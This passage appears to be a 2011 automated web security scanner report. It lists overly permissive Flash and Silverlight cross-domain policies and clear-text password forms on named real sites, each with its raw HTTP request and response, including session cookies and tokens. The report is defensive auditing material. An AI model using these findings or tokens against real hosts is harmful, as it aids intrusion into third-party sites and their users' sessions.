<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com"/>
...[SNIP]...
6.32. http://centrifugesystems.app101.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://centrifugesystems.app101.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: centrifugesystems.app101.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 210
Content-Type: text/xml
Last-Modified: Thu, 18 Oct 2007 00:47:20 GMT
Accept-Ranges: bytes
ETag: "01c41702011c81:cb38"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 19:27:59 GMT
Connection: close
Set-Cookie: HUBSPOT140=2064716972.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-doma
...[SNIP]...
6.33. http://pillsburylaw.app4.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pillsburylaw.app4.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:10146"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:09:09 GMT
Connection: close
Set-Cookie: HUBSPOT95=185668780.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...
6.34. http://www.boston.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:03 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
Accept-Ranges: bytes
Content-Length: 1310
Served-By: garrick
Keep-Alive: timeout=30
Connection: close
Content-Type: application/xml
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
...[SNIP]...
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...
7. Silverlight cross-domain policy  previous  next
There are 8 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 19:53:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
7.2. http://attorney.findlaw.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: attorney.findlaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:28 GMT
Server: Omniture DC/2.0.0
xserver: www29
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 18:35:49 GMT
Date: Thu, 12 May 2011 18:35:49 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
7.4. http://capgroup.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://capgroup.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: capgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:44:41 GMT
Server: Omniture DC/2.0.0
xserver: www150
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7.5. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 335
Date: Thu, 12 May 2011 16:11:58 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...
7.6. http://www.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:25 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...
7.7. http://www.cnbc.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:03 GMT
Via: 1.1 C aicache6
Content-Length: 713
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 12 May 2011 16:56:04 GMT

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com"/>
...[SNIP]...
7.8. http://www.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 791804430600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:39 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...
8. Cleartext submission of password  previous  next
There are 16 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boston.com
Path:   /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/ HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:06 GMT
Server: Apache/2.2.17 (Linux/SUSE) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Accept-Ranges: bytes
Served-By: nefertiti
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Content-Length: 37920

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Convention center gets $24m settlement - The Boston Globe</titl
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...
8.2. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<div id="template_left_bar">
           <form method="post" id="template_signin" class="fs_form" name="template_signin" action="article.php">
<fieldset style="border: none; display: none;">
...[SNIP]...
</label>
               <input type="password" name="User$0_password" class="t_signup_password"/>
               <input type="image" src="/template/hbj/images/template_signin_submit.png" class="submit" />
...[SNIP]...
8.3. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
</p>
<form method="post" action="http://www.hartfordbusiness.com/news14300.html#comments" class="fs_form fill" id="comment_form">
<fieldset style="border: none; display: none;">
...[SNIP]...
</label><input type="password" name="User$0_password" /></li>
...[SNIP]...
</label>            <input type="password" name="User$1_password" class="password medium" />
           <span class="error_detail">
...[SNIP]...
</label>            <input type="password" name="password_match" class="password medium" />
           <span class="error_detail">
...[SNIP]...
8.4. http://www.orangecountyala.org/clubportal/memlogin.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/memlogin.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /clubportal/memlogin.cfm?clubID=809 HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orangecountyala.org/clubportal/ocala/
Cookie: CFID=26523218; CFTOKEN=a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31; CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D2%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A06%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D3%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23;expires=Sat, 04-May-2041 18:12:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<table width="175" border="0" cellspacing="0" cellpadding="2" bgcolor="E8E8E8">
<form name="login" id="login" action="http://www.orangecountyala.org/clubportal/memLoginExe.cfm?clubID=809" method="post" enctype="multipart/form-data" onsubmit="return _CF_checklogin(this)">
   <input type="hidden" name="cftokenvalue" value="a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31" />
...[SNIP]...
<td width="100"><input name="password" id="password" type="password" size="12" /></td>
...[SNIP]...
8.5. http://www.pillsburylaw.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819540;path=/
Set-Cookie: CFTOKEN=67420103;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
</div>
                   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
                   <label>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
                       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
                   </label>
...[SNIP]...
8.6. http://www.pillsburylaw.com/index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:44:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<div class="box" id="loginbox">

   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
   <h2>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
   </label>
...[SNIP]...
8.7. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000SJ1mmU6BOCbzCEKkGgUIi9q:140i3s34m; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:25 GMT;path=/
Content-Length: 60330


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</div>

